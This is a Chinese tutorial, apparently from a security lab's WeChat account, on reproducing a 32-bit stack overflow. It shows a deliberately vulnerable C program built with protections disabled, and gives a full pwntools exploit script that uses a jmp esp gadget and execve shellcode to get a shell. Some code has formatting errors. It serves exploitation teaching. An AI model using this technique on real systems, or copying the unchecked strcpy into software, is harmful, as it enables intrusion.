栈溢出简单复现

一、工具安装

pwntools工具安装

$ sudo apt-get update

$ sudo apt-get install python2.7 python-pip python-devgit libssl-dev libffi-dev build-essential

$ sudo pip install --upgrade pip

$ sudo pip install --upgrade pwntools

 

gcc/gdb安装

$ sudo apt-get install gcc/gdb

 

peda安装

$ git clone https://github.com/longld/peda.git ~/peda

$ echo "source ~/peda/peda.py" >>~/.gdbinit    

二、程序

源码文件名为:StackOF.c

#include <stdio.h>

#include <string.h>

 

void vul(char *msg)

{

    charbuffer[64];

    strcpy(buffer,msg);

    return;

}

 

int main()

{

   puts("Soplz give me your shellcode:");

   charbuffer[256];

   memset(buffer,0,256);

   read(0,buffer,256);

    vul(buffer);

   return 0;

}

可以看到，其是将main函数里的buffer作为msg传入vul函数里，然后拷贝到vul中的buffer,但是main函数中buffer大小为256，而vul函数中buffer的大小为64,这就是问题所在。

为了调试方便把保护操作关闭

gcc编译：gcc -m32 -no-pie-fno-stack-protector -z execstack -o pwnme StackOF.c

-m32：生成32位的可执行文件

-no-pie：关闭程序ASLR/PIE（程序随机化保护）

-fno-stack-protector：关闭Stack Protector/Canary（栈保护）

-z execstack：关闭DEP/NX（堆栈不可执行）

-o：输出

pwnme：编译生成文件的文件名

StackOF.c:编译前的源文件

尝试运行pwnme

观察分析所开启的漏洞缓解策略

最好加一条命令关闭系统的的地址随机化

echo 0 > /proc/sys/kernel/randomize_va_space

三、思路

由源码可知该栈溢出漏洞的原因是在调用strcpy之前未对源字符串的长度进行安全检查。结果就是用户输入过长时，会向高地址覆盖。

那我们可以布局成

假设jmp esp的地址为0x12345678，在运行到原返回地址位置也就是0x12345678时，会执行0x12345678处的指令，也就是jmp esp,同时esp会+4,这时esp就指向了shellcode的起始位置，jmp esp一执行，接下来就是执行shellcode,如图：

所以要构造的buffer = 填充字符 + jmp_esp +shellcode

四、具体解决分析

jmp esp咋整呢？这个我们可以去libc文件中查找（libc是个啥？），c编写的程序都要加载libc文件.

1.libc怎么找？

首先，我们先查看加载的libc文件是什么版本
打开gdb调试pwnme

直接在main函数上下断点

然后r运行，加载程序，在断点断下

输入 info sharedlibrary或i sharedlibrary

这个时候你就找到了(- _-)!!!

2.找到jmp esp在libc中的地址:jmp_esp_addr_offset

很简单，上代码

from pwn import *

 

libc = ELF('/lib32/libc.so.6')                                #文件

jmp_esp = asm('jmp esp')                                      #jmp esp汇编指令的操作数

 

jmp_esp_addr_in_libc = libc.search(jmp_esp).next()            #搜索

 

print hex(jmp_esp_addr_in_libc)                               #打印

效果

但是！！！！这还没完，这个地址只是jmp esp在libc文件里的位置（也叫偏移地址，在最终代码将命名为jmp_esp_addr_offset），要知道其在程序里的地址还要加上libc在程序里的起始地址（也叫基址，在最终代码将命名为libc_base）,所以jmp esp在程序里的地址 : jmp_esp_addr = jmp_esp_addr_offset+libc_base,结合图解一下

3.找libc在程序里的地址：libc_base

输入指令LD_TRACE_LOADED_OBJECTS=1 ./pwnme可以得到加载

4.编写shellcode

通过调用系统调用获得shell
x31xc9xf7xe1xb0x0bx51x68x2fx2fx73x68x68x2fx62x69x6ex89xe3xcdx80

5.计算填充数据

寻找strcpy函数上面最后一个push edx,edx的值即为strcpy(buffer,msg)函数中buffer的起始地址(0xffffd190)：

N单步步过，s单步步入，步过到retn:

Esp（0xffffd1dc）即为返回值，用0xffffd1dc-0xffffd190=76

五、最终代码

from pwn import *

 

p = process('./pwnme')                    #运行程序

p.recvuntil("shellcode:")                 #当接受到字符串'shellcode:'

 

#找jmp_esp_addr_offset,见本文第四节第二点

libc = ELF('/lib32/libc.so.6')             

jmp_esp = asm('jmp esp')

 

jmp_esp_addr_offset = libc.search(jmp_esp).next()

 

if jmp_esp_addr_offset is None:

    print 'Cannot findjmp_esp in libc'

else:

    printhex(jmp_esp_addr_offset)

 

libc_base = 0xf7dd1000                              #你找到的libc加载地址

jmp_esp_addr = libc_base + jmp_esp_addr_offset      #得到jmp_esp_addr

 

print hex(jmp_esp_addr)

 

#构造布局,本文第三节

buf = 'A'*76                                                    #如何得到填充数据大小：https://www.jianshu.com/p/278f8d1f8322

buf += p32(jmp_esp_addr)

buf +='x31xc9xf7xe1xb0x0bx51x68x2fx2fx73x68x68x2fx62x69x6ex89xe3xcdx80'

 

with open('poc','wb') as f:

    f.write(buf)

 

p.sendline(buf)                                               #发送构造后的buf

 

p.interactive()

六、效果

原文始发于微信公众号（CTS纵横安全实验室）：栈溢出简单复现